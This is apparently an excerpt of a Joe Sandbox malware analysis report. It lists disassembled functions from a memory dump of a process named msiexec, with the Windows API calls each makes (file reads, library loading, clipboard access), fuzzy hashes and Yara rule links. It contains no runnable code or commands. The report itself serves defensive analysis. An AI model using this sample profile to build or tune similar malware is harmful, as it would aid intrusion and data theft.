                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                    Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                    Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                    Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                    Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                    Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                    Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: EnumNamesResource
                                                                    • String ID:
                                                                    • API String ID: 3334572018-0
                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                    Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                    Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind
                                                                    • String ID:
                                                                    • API String ID: 1863332320-0
                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                    Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                    Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                    Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004095FC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3655998216-0
                                                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                    Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00445426
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                    • String ID:
                                                                    • API String ID: 1828521557-0
                                                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                    Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@FilePointermemcpy
                                                                    • String ID:
                                                                    • API String ID: 609303285-0
                                                                    • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                    • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                    Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID:
                                                                    • API String ID: 2081463915-0
                                                                    • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                    • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                    • String ID:
                                                                    • API String ID: 2136311172-0
                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                    Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                    • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                    Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                    Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                    Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                    Non-executed Functions

                                                                    Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                    • String ID:
                                                                    • API String ID: 3604893535-0
                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                    Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                    • API String ID: 2780580303-317687271
                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                    Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EmptyClipboard.USER32 ref: 00409882
